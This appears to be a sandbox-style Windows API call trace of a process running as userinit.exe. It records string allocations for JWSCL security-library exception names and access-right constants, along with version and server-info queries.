[0160.516] SysReAllocStringLen (in: pbstr=0x29deec8*=0x0, psz="EJwsclInvalidOwnerException", len=0x1b | out: pbstr=0x29deec8*="EJwsclInvalidOwnerException") returned 1
[0160.516] SysReAllocStringLen (in: pbstr=0x29deeb0*=0x0, psz="EJwsclInvalidPrimaryToken", len=0x19 | out: pbstr=0x29deeb0*="EJwsclInvalidPrimaryToken") returned 1
[0160.516] SysReAllocStringLen (in: pbstr=0x29dee98*=0x0, psz="EJwsclTokenPrimaryException", len=0x1b | out: pbstr=0x29dee98*="EJwsclTokenPrimaryException") returned 1
[0160.516] SysReAllocStringLen (in: pbstr=0x29dee80*=0x0, psz="EJwsclTokenImpersonationException", len=0x21 | out: pbstr=0x29dee80*="EJwsclTokenImpersonationException") returned 1
[0160.516] SysReAllocStringLen (in: pbstr=0x29dee68*=0x0, psz="EJwsclTokenInformationException", len=0x1f | out: pbstr=0x29dee68*="EJwsclTokenInformationException") returned 1
[0160.516] SysReAllocStringLen (in: pbstr=0x29dee50*=0x0, psz="EJwsclSharedTokenException", len=0x1a | out: pbstr=0x29dee50*="EJwsclSharedTokenException") returned 1
[0160.516] SysReAllocStringLen (in: pbstr=0x29dee38*=0x0, psz="EJwsclOpenProcessTokenException", len=0x1f | out: pbstr=0x29dee38*="EJwsclOpenProcessTokenException") returned 1
[0160.516] SysReAllocStringLen (in: pbstr=0x29dee20*=0x0, psz="EJwsclOpenThreadTokenException", len=0x1e | out: pbstr=0x29dee20*="EJwsclOpenThreadTokenException") returned 1
[0160.516] SysReAllocStringLen (in: pbstr=0x29dee08*=0x0, psz="EJwsclSecurityException", len=0x17 | out: pbstr=0x29dee08*="EJwsclSecurityException") returned 1
[0160.516] SysReAllocStringLen (in: pbstr=0x29dedf0*=0x0, psz="Exception", len=0x9 | out: pbstr=0x29dedf0*="Exception") returned 1
[0160.517] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0160.517] GetProcAddress (hModule=0x75370000, lpProcName="GetVersionExA") returned 0x753c3861
[0160.517] GetVersionExA (in: lpVersionInformation=0x14f56c*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x76a6ea43, dwMinorVersion=0x660000, dwBuildNumber=0x0, dwPlatformId=0x10, szCSDVersion="\x94\xf5\x14") | out: lpVersionInformation=0x14f56c*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0160.517] GetModuleHandleA (lpModuleName="netapi32.dll") returned 0x0
[0160.517] LoadLibraryA (lpLibFileName="netapi32.dll") returned 0x73b10000
[0160.523] GetProcAddress (hModule=0x73b10000, lpProcName="NetServerGetInfo") returned 0x74f13cfa
[0160.523] NetServerGetInfo (in: servername="", level=0x65, bufptr=0x14f5f0 | out: bufptr=0x14f5f0) returned 0x0
[0160.528] GetModuleHandleA (lpModuleName="netapi32.dll") returned 0x73b10000
[0160.528] GetProcAddress (hModule=0x73b10000, lpProcName="NetApiBufferFree") returned 0x73b013d2
[0160.528] NetApiBufferFree (Buffer=0x681d00) returned 0x0
[0160.529] SetErrorMode (uMode=0x8000) returned 0x1
[0160.529] LoadLibraryA (lpLibFileName="OLEAUT32.DLL") returned 0x758f0000
[0160.529] SetErrorMode (uMode=0x1) returned 0x8000
[0160.529] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0160.531] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0160.533] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0160.535] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0160.536] SysReAllocStringLen (in: pbstr=0x29dec40*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x29dec40*="DELETE") returned 1
[0160.536] SysReAllocStringLen (in: pbstr=0x29dec30*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x29dec30*="READ_CONTROL") returned 1
[0160.537] SysReAllocStringLen (in: pbstr=0x29dec20*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x29dec20*="WRITE_OWNER") returned 1
[0160.537] SysReAllocStringLen (in: pbstr=0x29dec10*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x29dec10*="WRITE_DAC") returned 1
[0160.537] SysReAllocStringLen (in: pbstr=0x29dec00*=0x0, psz="FILE_WRITE_ATTRIBUTES", len=0x15 | out: pbstr=0x29dec00*="FILE_WRITE_ATTRIBUTES") returned 1
[0160.537] SysReAllocStringLen (in: pbstr=0x29debf0*=0x0, psz="FILE_READ_ATTRIBUTES", len=0x14 | out: pbstr=0x29debf0*="FILE_READ_ATTRIBUTES") returned 1
[0160.537] SysReAllocStringLen (in: pbstr=0x29debe0*=0x0, psz="FILE_CREATE_PIPE_INSTANCE", len=0x19 | out: pbstr=0x29debe0*="FILE_CREATE_PIPE_INSTANCE") returned 1
[0160.537] SysReAllocStringLen (in: pbstr=0x29debd0*=0x0, psz="FILE_WRITE_DATA", len=0xf | out: pbstr=0x29debd0*="FILE_WRITE_DATA") returned 1
[0160.537] SysReAllocStringLen (in: pbstr=0x29debc0*=0x0, psz="FILE_READ_DATA", len=0xe | out: pbstr=0x29debc0*="FILE_READ_DATA") returned 1
[0160.537] SysReAllocStringLen (in: pbstr=0x29debb0*=0x0, psz="FILE_ALL_ACCESS", len=0xf | out: pbstr=0x29debb0*="FILE_ALL_ACCESS") returned 1
[0160.537] SysReAllocStringLen (in: pbstr=0x29deba0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x29deba0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0160.537] SysReAllocStringLen (in: pbstr=0x29deb90*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x29deb90*="STANDARD_RIGHTS_WRITE") returned 1
[0160.537] SysReAllocStringLen (in: pbstr=0x29deb80*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x29deb80*="STANDARD_RIGHTS_READ") returned 1
[0160.537] SysReAllocStringLen (in: pbstr=0x29deb70*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x29deb70*="STANDARD_RIGHTS_ALL") returned 1
[0160.537] SysReAllocStringLen (in: pbstr=0x29deb50*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x29deb50*="DELETE") returned 1
[0160.537] SysReAllocStringLen (in: pbstr=0x29deb40*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x29deb40*="READ_CONTROL") returned 1
[0160.537] SysReAllocStringLen (in: pbstr=0x29deb30*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x29deb30*="WRITE_OWNER") returned 1
[0160.537] SysReAllocStringLen (in: pbstr=0x29deb20*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x29deb20*="WRITE_DAC") returned 1
[0160.537] SysReAllocStringLen (in: pbstr=0x29deb10*=0x0, psz="TOKEN_ADJUST_SESSIONID", len=0x16 | out: pbstr=0x29deb10*="TOKEN_ADJUST_SESSIONID") returned 1
[0160.537] SysReAllocStringLen (in: pbstr=0x29deb00*=0x0, psz="TOKEN_ADJUST_DEFAULT", len=0x14 | out: pbstr=0x29deb00*="TOKEN_ADJUST_DEFAULT") returned 1
[0160.537] SysReAllocStringLen (in: pbstr=0x29deaf0*=0x0, psz="TOKEN_ADJUST_GROUPS", len=0x13 | out: pbstr=0x29deaf0*="TOKEN_ADJUST_GROUPS") returned 1
[0160.537] SysReAllocStringLen (in: pbstr=0x29deae0*=0x0, psz="TOKEN_ADJUST_PRIVILEGES", len=0x17 | out: pbstr=0x29deae0*="TOKEN_ADJUST_PRIVILEGES") returned 1
[0160.537] SysReAllocStringLen (in: pbstr=0x29dead0*=0x0, psz="TOKEN_QUERY_SOURCE", len=0x12 | out: pbstr=0x29dead0*="TOKEN_QUERY_SOURCE") returned 1
[0160.537] SysReAllocStringLen (in: pbstr=0x29deac0*=0x0, psz="TOKEN_QUERY", len=0xb | out: pbstr=0x29deac0*="TOKEN_QUERY") returned 1
[0160.537] SysReAllocStringLen (in: pbstr=0x29deab0*=0x0, psz="TOKEN_IMPERSONATE", len=0x11 | out: pbstr=0x29deab0*="TOKEN_IMPERSONATE") returned 1
[0160.537] SysReAllocStringLen (in: pbstr=0x29deaa0*=0x0, psz="TOKEN_DUPLICATE", len=0xf | out: pbstr=0x29deaa0*="TOKEN_DUPLICATE") returned 1
[0160.537] SysReAllocStringLen (in: pbstr=0x29dea90*=0x0, psz="TOKEN_ASSIGN_PRIMARY", len=0x14 | out: pbstr=0x29dea90*="TOKEN_ASSIGN_PRIMARY") returned 1
[0160.537] SysReAllocStringLen (in: pbstr=0x29dea80*=0x0, psz="TOKEN_ALL_ACCESS", len=0x10 | out: pbstr=0x29dea80*="TOKEN_ALL_ACCESS") returned 1
[0160.537] SysReAllocStringLen (in: pbstr=0x29dea70*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x29dea70*="STANDARD_RIGHTS_EXECUTE") returned 1
[0160.538] SysReAllocStringLen (in: pbstr=0x29dea60*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x29dea60*="STANDARD_RIGHTS_WRITE") returned 1
[0160.538] SysReAllocStringLen (in: pbstr=0x29dea50*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x29dea50*="STANDARD_RIGHTS_READ") returned 1
[0160.538] SysReAllocStringLen (in: pbstr=0x29dea40*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x29dea40*="STANDARD_RIGHTS_ALL") returned 1
[0160.538] SysReAllocStringLen (in: pbstr=0x29dea30*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x29dea30*="DELETE") returned 1
[0160.538] SysReAllocStringLen (in: pbstr=0x29dea20*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x29dea20*="READ_CONTROL") returned 1
[0160.538] SysReAllocStringLen (in: pbstr=0x29dea10*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x29dea10*="WRITE_OWNER") returned 1
[0160.538] SysReAllocStringLen (in: pbstr=0x29dea00*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x29dea00*="WRITE_DAC") returned 1
[0160.538] SysReAllocStringLen (in: pbstr=0x29de9f0*=0x0, psz="TIMER_MODIFY_STATE", len=0x12 | out: pbstr=0x29de9f0*="TIMER_MODIFY_STATE") returned 1
[0160.538] SysReAllocStringLen (in: pbstr=0x29de9e0*=0x0, psz="TIMER_QUERY_STATE", len=0x11 | out: pbstr=0x29de9e0*="TIMER_QUERY_STATE") returned 1
[0160.538] SysReAllocStringLen (in: pbstr=0x29de9d0*=0x0, psz="TIMER_ALL_ACCESS", len=0x10 | out: pbstr=0x29de9d0*="TIMER_ALL_ACCESS") returned 1
[0160.538] SysReAllocStringLen (in: pbstr=0x29de9c0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x29de9c0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0160.538] SysReAllocStringLen (in: pbstr=0x29de9b0*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x29de9b0*="STANDARD_RIGHTS_WRITE") returned 1
[0160.538] SysReAllocStringLen (in: pbstr=0x29de9a0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x29de9a0*="STANDARD_RIGHTS_READ") returned 1
[0160.538] SysReAllocStringLen (in: pbstr=0x29de990*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x29de990*="STANDARD_RIGHTS_ALL") returned 1
[0160.538] SysReAllocStringLen (in: pbstr=0x29de980*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x29de980*="DELETE") returned 1
[0160.538] SysReAllocStringLen (in: pbstr=0x29de970*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x29de970*="READ_CONTROL") returned 1
[0160.538] SysReAllocStringLen (in: pbstr=0x29de960*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x29de960*="WRITE_OWNER") returned 1
[0160.538] SysReAllocStringLen (in: pbstr=0x29de950*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x29de950*="WRITE_DAC") returned 1
[0160.538] SysReAllocStringLen (in: pbstr=0x29de940*=0x0, psz="SECTION_EXTEND_SIZE", len=0x13 | out: pbstr=0x29de940*="SECTION_EXTEND_SIZE") returned 1
[0160.538] SysReAllocStringLen (in: pbstr=0x29de930*=0x0, psz="FILE_MAP_READ", len=0xd | out: pbstr=0x29de930*="FILE_MAP_READ") returned 1
[0160.538] SysReAllocStringLen (in: pbstr=0x29de920*=0x0, psz="FILE_MAP_WRITE", len=0xe | out: pbstr=0x29de920*="FILE_MAP_WRITE") returned 1
[0160.538] SysReAllocStringLen (in: pbstr=0x29de910*=0x0, psz="FILE_MAP_COPY", len=0xd | out: pbstr=0x29de910*="FILE_MAP_COPY") returned 1
[0160.538] SysReAllocStringLen (in: pbstr=0x29de900*=0x0, psz="FILE_MAP_ALL_ACCESS", len=0x13 | out: pbstr=0x29de900*="FILE_MAP_ALL_ACCESS") returned 1
[0160.538] SysReAllocStringLen (in: pbstr=0x29de8f0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x29de8f0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0160.538] SysReAllocStringLen (in: pbstr=0x29de8e0*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x29de8e0*="STANDARD_RIGHTS_WRITE") returned 1
[0160.538] SysReAllocStringLen (in: pbstr=0x29de8d0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x29de8d0*="STANDARD_RIGHTS_READ") returned 1
[0160.538] SysReAllocStringLen (in: pbstr=0x29de8c0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x29de8c0*="STANDARD_RIGHTS_ALL") returned 1
[0160.538] SysReAllocStringLen (in: pbstr=0x29de8b0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x29de8b0*="DELETE") returned 1
[0160.539] SysReAllocStringLen (in: pbstr=0x29de8a0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x29de8a0*="READ_CONTROL") returned 1
[0160.539] SysReAllocStringLen (in: pbstr=0x29de890*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x29de890*="WRITE_OWNER") returned 1
[0160.539] SysReAllocStringLen (in: pbstr=0x29de880*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x29de880*="WRITE_DAC") returned 1
[0160.539] SysReAllocStringLen (in: pbstr=0x29de870*=0x0, psz="MUTEX_MODIFY_STATE", len=0x12 | out: pbstr=0x29de870*="MUTEX_MODIFY_STATE") returned 1
[0160.539] SysReAllocStringLen (in: pbstr=0x29de860*=0x0, psz="MUTEX_ALL_ACCESS", len=0x10 | out: pbstr=0x29de860*="MUTEX_ALL_ACCESS") returned 1
[0160.539] SysReAllocStringLen (in: pbstr=0x29de850*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x29de850*="STANDARD_RIGHTS_EXECUTE") returned 1
[0160.539] SysReAllocStringLen (in: pbstr=0x29de840*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x29de840*="STANDARD_RIGHTS_WRITE") returned 1
[0160.539] SysReAllocStringLen (in: pbstr=0x29de830*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x29de830*="STANDARD_RIGHTS_READ") returned 1
[0160.539] SysReAllocStringLen (in: pbstr=0x29de820*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x29de820*="STANDARD_RIGHTS_ALL") returned 1
[0160.539] SysReAllocStringLen (in: pbstr=0x29de810*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x29de810*="DELETE") returned 1
[0160.539] SysReAllocStringLen (in: pbstr=0x29de800*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x29de800*="READ_CONTROL") returned 1
[0160.539] SysReAllocStringLen (in: pbstr=0x29de7f0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x29de7f0*="WRITE_OWNER") returned 1
[0160.539] SysReAllocStringLen (in: pbstr=0x29de7e0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x29de7e0*="WRITE_DAC") returned 1
[0160.539] SysReAllocStringLen (in: pbstr=0x29de7d0*=0x0, psz="EVENT_MODIFY_STATE", len=0x12 | out: pbstr=0x29de7d0*="EVENT_MODIFY_STATE") returned 1
[0160.539] SysReAllocStringLen (in: pbstr=0x29de7c0*=0x0, psz="EVENT_ALL_ACCESS", len=0x10 | out: pbstr=0x29de7c0*="EVENT_ALL_ACCESS") returned 1
[0160.539] SysReAllocStringLen (in: pbstr=0x29de7b0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x29de7b0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0160.539] SysReAllocStringLen (in: pbstr=0x29de7a0*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x29de7a0*="STANDARD_RIGHTS_WRITE") returned 1
[0160.539] SysReAllocStringLen (in: pbstr=0x29de790*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x29de790*="STANDARD_RIGHTS_READ") returned 1
[0160.539] SysReAllocStringLen (in: pbstr=0x29de780*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x29de780*="STANDARD_RIGHTS_ALL") returned 1
[0160.539] SysReAllocStringLen (in: pbstr=0x29de770*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x29de770*="DELETE") returned 1
[0160.539] SysReAllocStringLen (in: pbstr=0x29de760*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x29de760*="READ_CONTROL") returned 1
[0160.539] SysReAllocStringLen (in: pbstr=0x29de750*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x29de750*="WRITE_OWNER") returned 1
[0160.539] SysReAllocStringLen (in: pbstr=0x29de740*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x29de740*="WRITE_DAC") returned 1
[0160.539] SysReAllocStringLen (in: pbstr=0x29de730*=0x0, psz="SEMAPHORE_MODIFY_STATE", len=0x16 | out: pbstr=0x29de730*="SEMAPHORE_MODIFY_STATE") returned 1
[0160.539] SysReAllocStringLen (in: pbstr=0x29de720*=0x0, psz="SEMAPHORE_ALL_ACCESS", len=0x14 | out: pbstr=0x29de720*="SEMAPHORE_ALL_ACCESS") returned 1
[0160.539] SysReAllocStringLen (in: pbstr=0x29de710*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x29de710*="STANDARD_RIGHTS_EXECUTE") returned 1
[0160.539] SysReAllocStringLen (in: pbstr=0x29de700*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x29de700*="STANDARD_RIGHTS_WRITE") returned 1
[0160.540] SysReAllocStringLen (in: pbstr=0x29de6f0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x29de6f0*="STANDARD_RIGHTS_READ") returned 1
[0160.540] SysReAllocStringLen (in: pbstr=0x29de6e0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x29de6e0*="STANDARD_RIGHTS_ALL") returned 1
[0160.540] SysReAllocStringLen (in: pbstr=0x29de6d0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x29de6d0*="DELETE") returned 1
[0160.540] SysReAllocStringLen (in: pbstr=0x29de6c0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x29de6c0*="READ_CONTROL") returned 1
[0160.540] SysReAllocStringLen (in: pbstr=0x29de6b0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x29de6b0*="WRITE_OWNER") returned 1
[0160.540] SysReAllocStringLen (in: pbstr=0x29de6a0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x29de6a0*="WRITE_DAC") returned 1
[0160.540] SysReAllocStringLen (in: pbstr=0x29de690*=0x0, psz="JOB_OBJECT_SET_SECURITY_ATTRIBUTES", len=0x22 | out: pbstr=0x29de690*="JOB_OBJECT_SET_SECURITY_ATTRIBUTES") returned 1
[0160.540] SysReAllocStringLen (in: pbstr=0x29de680*=0x0, psz="JOB_OBJECT_TERMINATE", len=0x14 | out: pbstr=0x29de680*="JOB_OBJECT_TERMINATE") returned 1
[0160.540] SysReAllocStringLen (in: pbstr=0x29de670*=0x0, psz="JOB_OBJECT_QUERY", len=0x10 | out: pbstr=0x29de670*="JOB_OBJECT_QUERY") returned 1
[0160.540] SysReAllocStringLen (in: pbstr=0x29de660*=0x0, psz="JOB_OBJECT_SET_ATTRIBUTES", len=0x19 | out: pbstr=0x29de660*="JOB_OBJECT_SET_ATTRIBUTES") returned 1
[0160.540] SysReAllocStringLen (in: pbstr=0x29de650*=0x0, psz="JOB_OBJECT_ASSIGN_PROCESS", len=0x19 | out: pbstr=0x29de650*="JOB_OBJECT_ASSIGN_PROCESS") returned 1
[0160.540] SysReAllocStringLen (in: pbstr=0x29de640*=0x0, psz="JOB_OBJECT_ALL_ACCESS", len=0x15 | out: pbstr=0x29de640*="JOB_OBJECT_ALL_ACCESS") returned 1
[0160.540] SysReAllocStringLen (in: pbstr=0x29de630*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x29de630*="STANDARD_RIGHTS_EXECUTE") returned 1
[0160.540] SysReAllocStringLen (in: pbstr=0x29de620*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x29de620*="STANDARD_RIGHTS_WRITE") returned 1
[0160.540] SysReAllocStringLen (in: pbstr=0x29de610*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x29de610*="STANDARD_RIGHTS_READ") returned 1
[0160.540] SysReAllocStringLen (in: pbstr=0x29de600*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x29de600*="STANDARD_RIGHTS_ALL") returned 1
[0160.540] SysReAllocStringLen (in: pbstr=0x29de5f0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x29de5f0*="DELETE") returned 1
[0160.540] SysReAllocStringLen (in: pbstr=0x29de5e0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x29de5e0*="READ_CONTROL") returned 1
[0160.540] SysReAllocStringLen (in: pbstr=0x29de5d0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x29de5d0*="WRITE_OWNER") returned 1
[0160.540] SysReAllocStringLen (in: pbstr=0x29de5c0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x29de5c0*="WRITE_DAC") returned 1
[0160.540] SysReAllocStringLen (in: pbstr=0x29de5b0*=0x0, psz="THREAD_DIRECT_IMPERSONATION", len=0x1b | out: pbstr=0x29de5b0*="THREAD_DIRECT_IMPERSONATION") returned 1
[0160.540] SysReAllocStringLen (in: pbstr=0x29de5a0*=0x0, psz="THREAD_IMPERSONATE", len=0x12 | out: pbstr=0x29de5a0*="THREAD_IMPERSONATE") returned 1
[0160.540] SysReAllocStringLen (in: pbstr=0x29de590*=0x0, psz="THREAD_SET_THREAD_TOKEN", len=0x17 | out: pbstr=0x29de590*="THREAD_SET_THREAD_TOKEN") returned 1
[0160.540] SysReAllocStringLen (in: pbstr=0x29de580*=0x0, psz="THREAD_QUERY_INFORMATION", len=0x18 | out: pbstr=0x29de580*="THREAD_QUERY_INFORMATION") returned 1
[0160.540] SysReAllocStringLen (in: pbstr=0x29de570*=0x0, psz="THREAD_SET_INFORMATION", len=0x16 | out: pbstr=0x29de570*="THREAD_SET_INFORMATION") returned 1
[0160.540] SysReAllocStringLen (in: pbstr=0x29de560*=0x0, psz="THREAD_SET_CONTEXT", len=0x12 | out: pbstr=0x29de560*="THREAD_SET_CONTEXT") returned 1
[0160.540] SysReAllocStringLen (in: pbstr=0x29de550*=0x0, psz="THREAD_GET_CONTEXT", len=0x12 | out: pbstr=0x29de550*="THREAD_GET_CONTEXT") returned 1
[0160.540] SysReAllocStringLen (in: pbstr=0x29de540*=0x0, psz="THREAD_SUSPEND_RESUME", len=0x15 | out: pbstr=0x29de540*="THREAD_SUSPEND_RESUME") returned 1
[0160.541] SysReAllocStringLen (in: pbstr=0x29de530*=0x0, psz="THREAD_TERMINATE", len=0x10 | out: pbstr=0x29de530*="THREAD_TERMINATE") returned 1
[0160.541] SysReAllocStringLen (in: pbstr=0x29de520*=0x0, psz="THREAD_ALL_ACCESS", len=0x11 | out: pbstr=0x29de520*="THREAD_ALL_ACCESS") returned 1
[0160.541] SysReAllocStringLen (in: pbstr=0x29de510*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x29de510*="STANDARD_RIGHTS_EXECUTE") returned 1
[0160.541] SysReAllocStringLen (in: pbstr=0x29de500*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x29de500*="STANDARD_RIGHTS_WRITE") returned 1
[0160.541] SysReAllocStringLen (in: pbstr=0x29de4f0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x29de4f0*="STANDARD_RIGHTS_READ") returned 1
[0160.541] SysReAllocStringLen (in: pbstr=0x29de4e0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x29de4e0*="STANDARD_RIGHTS_ALL") returned 1
[0160.541] SysReAllocStringLen (in: pbstr=0x29de4d0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x29de4d0*="DELETE") returned 1
[0160.541] SysReAllocStringLen (in: pbstr=0x29de4c0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x29de4c0*="READ_CONTROL") returned 1
[0160.541] SysReAllocStringLen (in: pbstr=0x29de4b0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x29de4b0*="WRITE_OWNER") returned 1
[0160.541] SysReAllocStringLen (in: pbstr=0x29de4a0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x29de4a0*="WRITE_DAC") returned 1
[0160.541] SysReAllocStringLen (in: pbstr=0x29de490*=0x0, psz="PROCESS_QUERY_INFORMATION", len=0x19 | out: pbstr=0x29de490*="PROCESS_QUERY_INFORMATION") returned 1
[0160.541] SysReAllocStringLen (in: pbstr=0x29de480*=0x0, psz="PROCESS_SET_INFORMATION", len=0x17 | out: pbstr=0x29de480*="PROCESS_SET_INFORMATION") returned 1
[0160.541] SysReAllocStringLen (in: pbstr=0x29de470*=0x0, psz="PROCESS_SET_QUOTA", len=0x11 | out: pbstr=0x29de470*="PROCESS_SET_QUOTA") returned 1
[0160.541] SysReAllocStringLen (in: pbstr=0x29de460*=0x0, psz="PROCESS_CREATE_PROCESS", len=0x16 | out: pbstr=0x29de460*="PROCESS_CREATE_PROCESS") returned 1
[0160.541] SysReAllocStringLen (in: pbstr=0x29de450*=0x0, psz="PROCESS_DUP_HANDLE", len=0x12 | out: pbstr=0x29de450*="PROCESS_DUP_HANDLE") returned 1
[0160.541] SysReAllocStringLen (in: pbstr=0x29de440*=0x0, psz="PROCESS_VM_WRITE", len=0x10 | out: pbstr=0x29de440*="PROCESS_VM_WRITE") returned 1
[0160.541] SysReAllocStringLen (in: pbstr=0x29de430*=0x0, psz="PROCESS_VM_READ", len=0xf | out: pbstr=0x29de430*="PROCESS_VM_READ") returned 1
[0160.541] SysReAllocStringLen (in: pbstr=0x29de420*=0x0, psz="PROCESS_VM_OPERATION", len=0x14 | out: pbstr=0x29de420*="PROCESS_VM_OPERATION") returned 1
[0160.541] SysReAllocStringLen (in: pbstr=0x29de410*=0x0, psz="PROCESS_SET_SESSIONID", len=0x15 | out: pbstr=0x29de410*="PROCESS_SET_SESSIONID") returned 1
[0160.541] SysReAllocStringLen (in: pbstr=0x29de400*=0x0, psz="PROCESS_CREATE_THREAD", len=0x15 | out: pbstr=0x29de400*="PROCESS_CREATE_THREAD") returned 1
[0160.541] SysReAllocStringLen (in: pbstr=0x29de3f0*=0x0, psz="PROCESS_TERMINATE", len=0x11 | out: pbstr=0x29de3f0*="PROCESS_TERMINATE") returned 1
[0160.541] SysReAllocStringLen (in: pbstr=0x29de3e0*=0x0, psz="PROCESS_ALL_ACCESS", len=0x12 | out: pbstr=0x29de3e0*="PROCESS_ALL_ACCESS") returned 1
[0160.541] SysReAllocStringLen (in: pbstr=0x29de3d0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x29de3d0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0160.541] SysReAllocStringLen (in: pbstr=0x29de3c0*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x29de3c0*="STANDARD_RIGHTS_WRITE") returned 1
[0160.541] SysReAllocStringLen (in: pbstr=0x29de3b0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x29de3b0*="STANDARD_RIGHTS_READ") returned 1
[0160.541] SysReAllocStringLen (in: pbstr=0x29de3a0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x29de3a0*="STANDARD_RIGHTS_ALL") returned 1
[0160.541] SysReAllocStringLen (in: pbstr=0x29de390*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x29de390*="DELETE") returned 1
